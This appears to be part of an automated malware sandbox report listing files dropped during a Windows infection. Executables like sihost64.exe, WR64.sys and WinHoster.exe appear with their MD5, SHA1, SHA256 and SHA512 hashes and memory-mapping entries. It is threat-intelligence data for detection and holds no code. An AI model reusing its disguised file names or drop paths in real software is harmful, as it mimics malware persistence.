                                        • C:\ProgramData\6279164.exe
                                          MD5

                                          2c76b57419e7f8a66095faa6d53a687c

                                          SHA1

                                          33444cae4ddc3c2c0ce39fd0ec9c30fbbc714096

                                          SHA256

                                          496a6f3653e7e56b5fe18f0be1f46bd685ab3a41536fcb7075e11028b464b385

                                          SHA512

                                          1aa37ebadc0c1d29f87ef59074ba6c082369eb5b3ba297a34dcf9f5d5a9ca0664e33051d3b6346910fd0d49c69068ee99c8ed2464fff63679c1cf11362ddadfc

                                        • C:\ProgramData\6279164.exe
                                          MD5

                                          2c76b57419e7f8a66095faa6d53a687c

                                          SHA1

                                          33444cae4ddc3c2c0ce39fd0ec9c30fbbc714096

                                          SHA256

                                          496a6f3653e7e56b5fe18f0be1f46bd685ab3a41536fcb7075e11028b464b385

                                          SHA512

                                          1aa37ebadc0c1d29f87ef59074ba6c082369eb5b3ba297a34dcf9f5d5a9ca0664e33051d3b6346910fd0d49c69068ee99c8ed2464fff63679c1cf11362ddadfc

                                        • C:\Users\Admin\AppData\Local\Temp\MSIEE4B.tmp
                                          MD5

                                          0981d5c068a9c33f4e8110f81ffbb92e

                                          SHA1

                                          badb871adf6f24aba6923b9b21b211cea2aeca77

                                          SHA256

                                          b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68

                                          SHA512

                                          59cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8

                                        • C:\Users\Admin\AppData\Local\Temp\MSIEFA3.tmp
                                          MD5

                                          43d68e8389e7df33189d1c1a05a19ac8

                                          SHA1

                                          caf9cc610985e5cfdbae0c057233a6194ecbfed4

                                          SHA256

                                          85dc7518ad5aa46ef572f17050e3b004693784d1855cca9390da1143a64fceae

                                          SHA512

                                          58a76b4cb8f53cee73a8fc2afbd69388a1f2ea30ea3c0007beaa361cb0cc3d4d18c1fa8ccf036a2d2cf8fa07b01451000a704a626d95bd050afe6ba808e6de1e

                                        • C:\Users\Admin\AppData\Local\Temp\Mortician.exe
                                          MD5

                                          eaf2ab649a2ccfd311b2b68be2dba692

                                          SHA1

                                          dbb04ab27451c097472b8833c81f6a91096c2cd2

                                          SHA256

                                          e1420b48611f4cf7d15e126f594d5940f8f619b75603930650d1a5734fdcd372

                                          SHA512

                                          ef33d361847bb527bf8c9b7813e54d0da32ffc83fa92724a13f1bb4d1612d6e35024a41652ed37f0496102ebf182bd4b2d045d07c2c9361fef6091a6f55645d2

                                        • C:\Users\Admin\AppData\Local\Temp\Mortician.exe
                                          MD5

                                          eaf2ab649a2ccfd311b2b68be2dba692

                                          SHA1

                                          dbb04ab27451c097472b8833c81f6a91096c2cd2

                                          SHA256

                                          e1420b48611f4cf7d15e126f594d5940f8f619b75603930650d1a5734fdcd372

                                          SHA512

                                          ef33d361847bb527bf8c9b7813e54d0da32ffc83fa92724a13f1bb4d1612d6e35024a41652ed37f0496102ebf182bd4b2d045d07c2c9361fef6091a6f55645d2

                                        • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe
                                          MD5

                                          7571400b94dc25d19eec9421c340d7f4

                                          SHA1

                                          c0c6b95bde12a1b80f5f52ce2bbb809a304fd2a6

                                          SHA256

                                          e671f50b7eb6a2e8d14884d15ec2d46db00477ba8da04176d0661ba4b664f1b9

                                          SHA512

                                          4c7cdecdb42bcaa310749d4707c6fc0c645cd359b4d74ba9e910aedc3f52e0261ea61c0346ca51378c4fc465159f45b03a8527d38aa6f6211aa21343a116b055

                                        • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe
                                          MD5

                                          7571400b94dc25d19eec9421c340d7f4

                                          SHA1

                                          c0c6b95bde12a1b80f5f52ce2bbb809a304fd2a6

                                          SHA256

                                          e671f50b7eb6a2e8d14884d15ec2d46db00477ba8da04176d0661ba4b664f1b9

                                          SHA512

                                          4c7cdecdb42bcaa310749d4707c6fc0c645cd359b4d74ba9e910aedc3f52e0261ea61c0346ca51378c4fc465159f45b03a8527d38aa6f6211aa21343a116b055

                                        • C:\Users\Admin\AppData\Local\Temp\Services.exe
                                          MD5

                                          9774cdf92008b796b09b39ee32e48821

                                          SHA1

                                          24653206d995c907ff8e6f5f4eed7fb1c36cb33e

                                          SHA256

                                          0f29ab9350ea8ef259a4bade5c1f7fa4f7850ad75f123ee868c7d581817fd02e

                                          SHA512

                                          9c910eee8ed7ac0eade078389e7de2b2ccc3a17966c8c12704f0f889a7d02f790c5daf0d68ca21deae30680880e9a621123c04650dfdd3f4dfecad7958dafbcb

                                        • C:\Users\Admin\AppData\Local\Temp\Services.exe
                                          MD5

                                          9774cdf92008b796b09b39ee32e48821

                                          SHA1

                                          24653206d995c907ff8e6f5f4eed7fb1c36cb33e

                                          SHA256

                                          0f29ab9350ea8ef259a4bade5c1f7fa4f7850ad75f123ee868c7d581817fd02e

                                          SHA512

                                          9c910eee8ed7ac0eade078389e7de2b2ccc3a17966c8c12704f0f889a7d02f790c5daf0d68ca21deae30680880e9a621123c04650dfdd3f4dfecad7958dafbcb

                                        • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                          MD5

                                          3e5b02cb8b9ddb45884a6f3f078fd1a7

                                          SHA1

                                          6a5a3c980e486052d716ddfbb6d5f3fb9c49b255

                                          SHA256

                                          b9f33d7a485ddc0d8d32b8c2440493cee5481b44b76013462264631d9dd37188

                                          SHA512

                                          71b9c248815b55afa017340c9f506a6b1f99cc8a8967222b8fc16281cef05832d4811fdff7d6bd8ef2053dfb77cd517c2ba1c6c0dccb9dcdbad885d5944cf51e

                                        • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                          MD5

                                          1c7be730bdc4833afb7117d48c3fd513

                                          SHA1

                                          dc7e38cfe2ae4a117922306aead5a7544af646b8

                                          SHA256

                                          8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                          SHA512

                                          7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                        • C:\Users\Admin\AppData\Local\Temp\foradvertising.exe
                                          MD5

                                          0a9075468c1009ba33eee56d10b244de

                                          SHA1

                                          8aa006765f0c5c5c2d4e7df9f5fd942f7e2eb970

                                          SHA256

                                          efaac8d4f56f9d3b3ba817cc463a99ab9025af0c9f8928d7725a1ae266c3a784

                                          SHA512

                                          6c514c33adcc7b78f7457cc657821d04fa5112e8b860307f759c0714192b659a6538cea75091bc804396518e4eb6a9f32e0932867c471e6b13bf3bb6148482dd

                                        • C:\Users\Admin\AppData\Local\Temp\foradvertising.exe
                                          MD5

                                          0a9075468c1009ba33eee56d10b244de

                                          SHA1

                                          8aa006765f0c5c5c2d4e7df9f5fd942f7e2eb970

                                          SHA256

                                          efaac8d4f56f9d3b3ba817cc463a99ab9025af0c9f8928d7725a1ae266c3a784

                                          SHA512

                                          6c514c33adcc7b78f7457cc657821d04fa5112e8b860307f759c0714192b659a6538cea75091bc804396518e4eb6a9f32e0932867c471e6b13bf3bb6148482dd

                                        • C:\Users\Admin\AppData\Local\Temp\gdgame.exe
                                          MD5

                                          adfe31c40569ca5b0b403f0ba3f7b24c

                                          SHA1

                                          76ad7f27ae76bc852b64ac248d85e6996fe88d20

                                          SHA256

                                          68d1b6dbfc303f1949267ce03ac2164ee9cda951231e72e6a5e39a44764ebbf2

                                          SHA512

                                          b9c96413ae2d40895bfe31e608de712349be08acf9d8ffa46150cc46bbdbaa4aa86b3e2901c73515545e6810ba99335c5441d8114ae1436710ea2b30772df44e

                                        • C:\Users\Admin\AppData\Local\Temp\gdgame.exe
                                          MD5

                                          adfe31c40569ca5b0b403f0ba3f7b24c

                                          SHA1

                                          76ad7f27ae76bc852b64ac248d85e6996fe88d20

                                          SHA256

                                          68d1b6dbfc303f1949267ce03ac2164ee9cda951231e72e6a5e39a44764ebbf2

                                          SHA512

                                          b9c96413ae2d40895bfe31e608de712349be08acf9d8ffa46150cc46bbdbaa4aa86b3e2901c73515545e6810ba99335c5441d8114ae1436710ea2b30772df44e

                                        • C:\Users\Admin\AppData\Local\Temp\gdgame.exe
                                          MD5

                                          adfe31c40569ca5b0b403f0ba3f7b24c

                                          SHA1

                                          76ad7f27ae76bc852b64ac248d85e6996fe88d20

                                          SHA256

                                          68d1b6dbfc303f1949267ce03ac2164ee9cda951231e72e6a5e39a44764ebbf2

                                          SHA512

                                          b9c96413ae2d40895bfe31e608de712349be08acf9d8ffa46150cc46bbdbaa4aa86b3e2901c73515545e6810ba99335c5441d8114ae1436710ea2b30772df44e

                                        • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                          MD5

                                          c313ddb7df24003d25bf62c5a218b215

                                          SHA1

                                          20a3404b7e17b530885fa0be130e784f827986ee

                                          SHA256

                                          e3bc81a59fc45dfdfcc57b0078437061cb8c3396e1d593fcf187e3cdf0373ed1

                                          SHA512

                                          542e2746626a066f3e875ae2f0d15e2c4beb5887376bb0218090f0e8492a6fdb11fa02b035d7d4200562811df7d2187b8a993a0b7f65489535919bdf11eb4cff

                                        • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                          MD5

                                          c313ddb7df24003d25bf62c5a218b215

                                          SHA1

                                          20a3404b7e17b530885fa0be130e784f827986ee

                                          SHA256

                                          e3bc81a59fc45dfdfcc57b0078437061cb8c3396e1d593fcf187e3cdf0373ed1

                                          SHA512

                                          542e2746626a066f3e875ae2f0d15e2c4beb5887376bb0218090f0e8492a6fdb11fa02b035d7d4200562811df7d2187b8a993a0b7f65489535919bdf11eb4cff

                                        • C:\Users\Admin\AppData\Local\Temp\is-4MFVK.tmp\Setup.exe
                                          MD5

                                          9774cdf92008b796b09b39ee32e48821

                                          SHA1

                                          24653206d995c907ff8e6f5f4eed7fb1c36cb33e

                                          SHA256

                                          0f29ab9350ea8ef259a4bade5c1f7fa4f7850ad75f123ee868c7d581817fd02e

                                          SHA512

                                          9c910eee8ed7ac0eade078389e7de2b2ccc3a17966c8c12704f0f889a7d02f790c5daf0d68ca21deae30680880e9a621123c04650dfdd3f4dfecad7958dafbcb

                                        • C:\Users\Admin\AppData\Local\Temp\is-4MFVK.tmp\Setup.exe
                                          MD5

                                          9774cdf92008b796b09b39ee32e48821

                                          SHA1

                                          24653206d995c907ff8e6f5f4eed7fb1c36cb33e

                                          SHA256

                                          0f29ab9350ea8ef259a4bade5c1f7fa4f7850ad75f123ee868c7d581817fd02e

                                          SHA512

                                          9c910eee8ed7ac0eade078389e7de2b2ccc3a17966c8c12704f0f889a7d02f790c5daf0d68ca21deae30680880e9a621123c04650dfdd3f4dfecad7958dafbcb

                                        • C:\Users\Admin\AppData\Local\Temp\is-CND7Q.tmp\Setup.exe
                                          MD5

                                          def9599209590baff16b157f8e4e5e8d

                                          SHA1

                                          5917f486a394dbaac4b30f3932c234da20e40bc8

                                          SHA256

                                          e9b1adacfccab6f44b2c8a285d5b6bc66f2b3ce3d87e6d2ce4c036d7e0792faa

                                          SHA512

                                          7bd7a0f1220f4d2c83bfb5d5829244c6d854cd6d8299fc1bce6c49699f674be22010ee921b0d1acf646e339d442e70a6690483ec318142d929e160499f8e5419

                                        • C:\Users\Admin\AppData\Local\Temp\is-CND7Q.tmp\Setup.exe
                                          MD5

                                          def9599209590baff16b157f8e4e5e8d

                                          SHA1

                                          5917f486a394dbaac4b30f3932c234da20e40bc8

                                          SHA256

                                          e9b1adacfccab6f44b2c8a285d5b6bc66f2b3ce3d87e6d2ce4c036d7e0792faa

                                          SHA512

                                          7bd7a0f1220f4d2c83bfb5d5829244c6d854cd6d8299fc1bce6c49699f674be22010ee921b0d1acf646e339d442e70a6690483ec318142d929e160499f8e5419

                                        • C:\Users\Admin\AppData\Local\Temp\is-QEVD1.tmp\stats.tmp
                                          MD5

                                          ffcf263a020aa7794015af0edee5df0b

                                          SHA1

                                          bce1eb5f0efb2c83f416b1782ea07c776666fdab

                                          SHA256

                                          1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64

                                          SHA512

                                          49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a

                                        • C:\Users\Admin\AppData\Local\Temp\is-TOU3P.tmp\Fri195cd4dbfdf37897.tmp
                                          MD5

                                          ffcf263a020aa7794015af0edee5df0b

                                          SHA1

                                          bce1eb5f0efb2c83f416b1782ea07c776666fdab

                                          SHA256

                                          1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64

                                          SHA512

                                          49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a

                                        • C:\Users\Admin\AppData\Local\Temp\wrap 1.exe
                                          MD5

                                          daf389ec9f03d76a9ce39a882dc8e92e

                                          SHA1

                                          ac5580518736180f787d65571fdd8ebb72d18f70

                                          SHA256

                                          431372ee3826f61c6b2b40cec8dbbc6687a659b126c5267f8ed9a7b34eb4e478

                                          SHA512

                                          eca3ca02fa27f419d8f14157d8b26009c0616af17dbc2b80f78de21ff8e93d902e8c376497c06296fa784b31f1bfa4b68c203e59972e8bd3f677c8f44032a52a

                                        • C:\Users\Admin\AppData\Local\Temp\wrap 1.exe
                                          MD5

                                          daf389ec9f03d76a9ce39a882dc8e92e

                                          SHA1

                                          ac5580518736180f787d65571fdd8ebb72d18f70

                                          SHA256

                                          431372ee3826f61c6b2b40cec8dbbc6687a659b126c5267f8ed9a7b34eb4e478

                                          SHA512

                                          eca3ca02fa27f419d8f14157d8b26009c0616af17dbc2b80f78de21ff8e93d902e8c376497c06296fa784b31f1bfa4b68c203e59972e8bd3f677c8f44032a52a

                                        • C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi
                                          MD5

                                          98e537669f4ce0062f230a14bcfcaf35

                                          SHA1

                                          a19344f6a5e59c71f51e86119f5fa52030a92810

                                          SHA256

                                          6f515aac05311f411968ee6e48d287a1eb452e404ffeff75ee0530dcf3243735

                                          SHA512

                                          1ebc254289610be65882a6ceb1beebbf2be83006117f0a6ccbddd19ab7dc807978232a13ad5fa39b6f06f694d4f7c75760b773d70b87c0badef1da89bb7af3ac

                                        • C:\Users\Admin\AppData\Roaming\Attesa.vsdx
                                          MD5

                                          37cb3811ac9fb015453fdbcce6ce1f14

                                          SHA1

                                          d45d27dfb8157862a9706ecd58a61ddfad399b76

                                          SHA256

                                          8b8495b244ff4e32b42d99bfae33809d41e6c5446f8f33c1ec88b43ba2f972b5

                                          SHA512

                                          17f5f381544183d332bd347b4ae5ce0975aa5f0a4f9dc9cacd27bc5d60653bbe97bf75bd3c15d2d7d665749d98eec85a54b3fc1ed82c374e1649ec340fb4b648

                                        • C:\Users\Admin\AppData\Roaming\Cerchia.vsdx
                                          MD5

                                          1174bc23ece5ef1c0d45271dc5dbccc2

                                          SHA1

                                          5ee5cae94d01e2ed40680ea14a6631f6ff049d05

                                          SHA256

                                          0d0328f7487a2ce0b2033d8ef8e276b17a5096f36519e0ee58702b9ffe69f418

                                          SHA512

                                          08e4bc2e04406acf0dc022154ca77e9ba48e442ff885d1605a633cddb0d87667f9f09ba8f31effffaf88819a8d54320bea92031beb723189746000346f64ebd2

                                        • C:\Users\Admin\AppData\Roaming\Confronto.vsdx
                                          MD5

                                          549c56159ead198e662d2d9a66d02f9d

                                          SHA1

                                          266742d056dae97ea7bca57ed60e595bcd7c6647

                                          SHA256

                                          dff6041bba9446bca6445cfc6202a02590a87d7c56e1d6328125aa76c86cbc82

                                          SHA512

                                          fa4b245980330db9fa66818798f03b4201bf2ff09f33f1e26cde71ae6b3897f09f7f80a5e7f32f9aa85df1c2f19750da6cbaad4e53e2280e1d522d1fcb635f62

                                        • C:\Users\Admin\AppData\Roaming\I
                                          MD5

                                          725570471bb1a78da4c5a0e8a3f5d5a3

                                          SHA1

                                          e65eff7c9ad295aac575d4dbea5f781a904a5d09

                                          SHA256

                                          2eb3aea4e70acefc8a45cc6e36483531169f47d54ebc6c755e5752a328967701

                                          SHA512

                                          33768e952736553997baebd9d48b5be9bb14d791f1e7fef30bc39a7929424e51b330a63e1e4b2f5919f54f9a8912c0f853d5b6111ed275ae76e8ad2bd51063e3

                                        • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                          MD5

                                          c56b5f0201a3b3de53e561fe76912bfd

                                          SHA1

                                          2a4062e10a5de813f5688221dbeb3f3ff33eb417

                                          SHA256

                                          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                                          SHA512

                                          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                                        • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                          MD5

                                          c56b5f0201a3b3de53e561fe76912bfd

                                          SHA1

                                          2a4062e10a5de813f5688221dbeb3f3ff33eb417

                                          SHA256

                                          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                                          SHA512

                                          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                                        • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                          MD5

                                          c56b5f0201a3b3de53e561fe76912bfd

                                          SHA1

                                          2a4062e10a5de813f5688221dbeb3f3ff33eb417

                                          SHA256

                                          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                                          SHA512

                                          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
                                          MD5

                                          0c0195c48b6b8582fa6f6373032118da

                                          SHA1

                                          d25340ae8e92a6d29f599fef426a2bc1b5217299

                                          SHA256

                                          11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

                                          SHA512

                                          ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                          MD5

                                          bf22027e42a9dd3cc69b7298721d8ebc

                                          SHA1

                                          910d3b7bc580a95c241e148adefe20948bde33e9

                                          SHA256

                                          2cd59d4258475495c54133c8b9fc409634c246b010af9b5cf26fdea0f96c5db4

                                          SHA512

                                          98e9c4c950a2c175691e6592da6e04277bad228fb256cb4ef02af652481b757afc8cd6bee0e8ff3f43b447faca333d70330e34e99276e6ee3e9647cb977bf996

                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                          MD5

                                          bf22027e42a9dd3cc69b7298721d8ebc

                                          SHA1

                                          910d3b7bc580a95c241e148adefe20948bde33e9

                                          SHA256

                                          2cd59d4258475495c54133c8b9fc409634c246b010af9b5cf26fdea0f96c5db4

                                          SHA512

                                          98e9c4c950a2c175691e6592da6e04277bad228fb256cb4ef02af652481b757afc8cd6bee0e8ff3f43b447faca333d70330e34e99276e6ee3e9647cb977bf996

                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                          MD5

                                          bf22027e42a9dd3cc69b7298721d8ebc

                                          SHA1

                                          910d3b7bc580a95c241e148adefe20948bde33e9

                                          SHA256

                                          2cd59d4258475495c54133c8b9fc409634c246b010af9b5cf26fdea0f96c5db4

                                          SHA512

                                          98e9c4c950a2c175691e6592da6e04277bad228fb256cb4ef02af652481b757afc8cd6bee0e8ff3f43b447faca333d70330e34e99276e6ee3e9647cb977bf996

                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                          MD5

                                          bf22027e42a9dd3cc69b7298721d8ebc

                                          SHA1

                                          910d3b7bc580a95c241e148adefe20948bde33e9

                                          SHA256

                                          2cd59d4258475495c54133c8b9fc409634c246b010af9b5cf26fdea0f96c5db4

                                          SHA512

                                          98e9c4c950a2c175691e6592da6e04277bad228fb256cb4ef02af652481b757afc8cd6bee0e8ff3f43b447faca333d70330e34e99276e6ee3e9647cb977bf996

                                        • C:\Users\Admin\AppData\Roaming\Peso.vsdx
                                          MD5

                                          725570471bb1a78da4c5a0e8a3f5d5a3

                                          SHA1

                                          e65eff7c9ad295aac575d4dbea5f781a904a5d09

                                          SHA256

                                          2eb3aea4e70acefc8a45cc6e36483531169f47d54ebc6c755e5752a328967701

                                          SHA512

                                          33768e952736553997baebd9d48b5be9bb14d791f1e7fef30bc39a7929424e51b330a63e1e4b2f5919f54f9a8912c0f853d5b6111ed275ae76e8ad2bd51063e3

                                        • C:\Users\Admin\AppData\Roaming\RegAsm.exe
                                          MD5

                                          b58b926c3574d28d5b7fdd2ca3ec30d5

                                          SHA1

                                          d260c4ffd603a9cfc057fcb83d678b1cecdf86f9

                                          SHA256

                                          6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3

                                          SHA512

                                          b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab

                                        • C:\Users\Admin\AppData\Roaming\RegAsm.exe
                                          MD5

                                          b58b926c3574d28d5b7fdd2ca3ec30d5

                                          SHA1

                                          d260c4ffd603a9cfc057fcb83d678b1cecdf86f9

                                          SHA256

                                          6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3

                                          SHA512

                                          b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab

                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                          MD5

                                          b9295c5e9138ccf15d67771f3726c778

                                          SHA1

                                          40cd9d94e9913a52877f09f340a5c2604030409c

                                          SHA256

                                          8c4a2330010cdb34faf9f565943736d0bb9d21eb96a67ccc20c246cfe13e6292

                                          SHA512

                                          4e1d7e74be77d151b79024db20f3427c53ddf0557bbccd71b93750514462b5d2d2130948c668b05e66cf4098a56ad34c75ec7d1bd2e21e1c0bda01f7f4345f08

                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                          MD5

                                          b9295c5e9138ccf15d67771f3726c778

                                          SHA1

                                          40cd9d94e9913a52877f09f340a5c2604030409c

                                          SHA256

                                          8c4a2330010cdb34faf9f565943736d0bb9d21eb96a67ccc20c246cfe13e6292

                                          SHA512

                                          4e1d7e74be77d151b79024db20f3427c53ddf0557bbccd71b93750514462b5d2d2130948c668b05e66cf4098a56ad34c75ec7d1bd2e21e1c0bda01f7f4345f08

                                        • \Users\Admin\AppData\Local\Temp\INAED7E.tmp
                                          MD5

                                          7468eca4e3b4dbea0711a81ae9e6e3f2

                                          SHA1

                                          4a0c34c342ee7c9df2a0d58d0b5e8bfe94d1251d

                                          SHA256

                                          73af1e816ec70be2a3e087af6ed7abc783c50c06b9df224f101e13a792df9837

                                          SHA512

                                          3f93a70c8cc05426e08a404c9d1922a46dd4122e7f42bc292f3b5064903a15e13069b58cb615918cc06deaf31bd5805a925cbd656aabc5d78068eb7224a63f56

                                        • \Users\Admin\AppData\Local\Temp\MSIEE4B.tmp
                                          MD5

                                          0981d5c068a9c33f4e8110f81ffbb92e

                                          SHA1

                                          badb871adf6f24aba6923b9b21b211cea2aeca77

                                          SHA256

                                          b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68

                                          SHA512

                                          59cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8

                                        • \Users\Admin\AppData\Local\Temp\MSIEFA3.tmp
                                          MD5

                                          43d68e8389e7df33189d1c1a05a19ac8

                                          SHA1

                                          caf9cc610985e5cfdbae0c057233a6194ecbfed4

                                          SHA256

                                          85dc7518ad5aa46ef572f17050e3b004693784d1855cca9390da1143a64fceae

                                          SHA512

                                          58a76b4cb8f53cee73a8fc2afbd69388a1f2ea30ea3c0007beaa361cb0cc3d4d18c1fa8ccf036a2d2cf8fa07b01451000a704a626d95bd050afe6ba808e6de1e

                                        • \Users\Admin\AppData\Local\Temp\axhub.dll
                                          MD5

                                          1c7be730bdc4833afb7117d48c3fd513

                                          SHA1

                                          dc7e38cfe2ae4a117922306aead5a7544af646b8

                                          SHA256

                                          8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                          SHA512

                                          7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                        • \Users\Admin\AppData\Local\Temp\is-4MFVK.tmp\itdownload.dll
                                          MD5

                                          d82a429efd885ca0f324dd92afb6b7b8

                                          SHA1

                                          86bbdaa15e6fc5c7779ac69c84e53c43c9eb20ea

                                          SHA256

                                          b258c4d7d2113dee2168ed7e35568c8e03341e24e3eafc7a22a0d62e32122ef3

                                          SHA512

                                          5bf0c3b8fa5db63205a263c4fa5337188173248bef609ba4d03508c50db1fd1e336f3041ce96d78cc97659357a83e6e422f5b079d893a20a683270e05f5438df

                                        • \Users\Admin\AppData\Local\Temp\is-4MFVK.tmp\itdownload.dll
                                          MD5

                                          d82a429efd885ca0f324dd92afb6b7b8

                                          SHA1

                                          86bbdaa15e6fc5c7779ac69c84e53c43c9eb20ea

                                          SHA256

                                          b258c4d7d2113dee2168ed7e35568c8e03341e24e3eafc7a22a0d62e32122ef3

                                          SHA512

                                          5bf0c3b8fa5db63205a263c4fa5337188173248bef609ba4d03508c50db1fd1e336f3041ce96d78cc97659357a83e6e422f5b079d893a20a683270e05f5438df

                                        • \Users\Admin\AppData\Local\Temp\is-CND7Q.tmp\itdownload.dll
                                          MD5

                                          d82a429efd885ca0f324dd92afb6b7b8

                                          SHA1

                                          86bbdaa15e6fc5c7779ac69c84e53c43c9eb20ea

                                          SHA256

                                          b258c4d7d2113dee2168ed7e35568c8e03341e24e3eafc7a22a0d62e32122ef3

                                          SHA512

                                          5bf0c3b8fa5db63205a263c4fa5337188173248bef609ba4d03508c50db1fd1e336f3041ce96d78cc97659357a83e6e422f5b079d893a20a683270e05f5438df

                                        • \Users\Admin\AppData\Local\Temp\is-CND7Q.tmp\itdownload.dll
                                          MD5

                                          d82a429efd885ca0f324dd92afb6b7b8

                                          SHA1

                                          86bbdaa15e6fc5c7779ac69c84e53c43c9eb20ea

                                          SHA256

                                          b258c4d7d2113dee2168ed7e35568c8e03341e24e3eafc7a22a0d62e32122ef3

                                          SHA512

                                          5bf0c3b8fa5db63205a263c4fa5337188173248bef609ba4d03508c50db1fd1e336f3041ce96d78cc97659357a83e6e422f5b079d893a20a683270e05f5438df

                                        • \Users\Admin\AppData\Local\Temp\nsl89B8.tmp\nsExec.dll
                                          MD5

                                          ec9c99216ef11cdd85965e78bc797d2c

                                          SHA1

                                          1d5f93fbf4f8aab8164b109e9e1768e7b80ad88c

                                          SHA256

                                          c1b7c3ef8b77a5bb335dc9ec9c3546b249014dde43aa2a9ed719b4d5933741df

                                          SHA512

                                          35ff522c4efb3875fce0d6dce438f5225e5f27b414e7c16df88031e90b528c057fe10b4bbf755445c0500c3521e0797f562690aa7209f588169164bbfaceaba1

                                        • \Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
                                          MD5

                                          2ca6d4ed5dd15fb7934c87e857f5ebfc

                                          SHA1

                                          383a55cc0ab890f41b71ca67e070ac7c903adeb6

                                          SHA256

                                          39412aacdcddc4b2b3cfeb126456edb125ce8cadb131ca5c23c031db4431c5fc

                                          SHA512

                                          ce11aa5bd7b0da4baf07146e8377ff0331c1d4b04aaa4408373b4dd0fe2c3f82c84b179d9a90d26cdaa02180f22276d96cf491f9ede66f5f1da6f43cc72e5ac4

                                        • \Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
                                          MD5

                                          2ca6d4ed5dd15fb7934c87e857f5ebfc

                                          SHA1

                                          383a55cc0ab890f41b71ca67e070ac7c903adeb6

                                          SHA256

                                          39412aacdcddc4b2b3cfeb126456edb125ce8cadb131ca5c23c031db4431c5fc

                                          SHA512

                                          ce11aa5bd7b0da4baf07146e8377ff0331c1d4b04aaa4408373b4dd0fe2c3f82c84b179d9a90d26cdaa02180f22276d96cf491f9ede66f5f1da6f43cc72e5ac4

                                        • memory/60-414-0x0000000000000000-mapping.dmp
                                        • memory/588-246-0x0000000000000000-mapping.dmp
                                        • memory/720-256-0x0000000000000000-mapping.dmp
                                        • memory/812-504-0x0000000000000000-mapping.dmp
                                        • memory/996-502-0x0000000000000000-mapping.dmp
                                        • memory/1020-494-0x0000000000000000-mapping.dmp
                                        • memory/1080-407-0x0000000000000000-mapping.dmp
                                        • memory/1088-268-0x0000000000400000-0x0000000002164000-memory.dmp
                                          Filesize

                                          29.4MB

                                        • memory/1088-267-0x0000000002260000-0x00000000023AA000-memory.dmp
                                          Filesize

                                          1.3MB

                                        • memory/1088-264-0x0000000000000000-mapping.dmp
                                        • memory/1168-425-0x00007FF7A5304060-mapping.dmp
                                        • memory/1300-216-0x000000001D860000-0x000000001D862000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1300-189-0x0000000000700000-0x0000000000701000-memory.dmp
                                          Filesize

                                          4KB

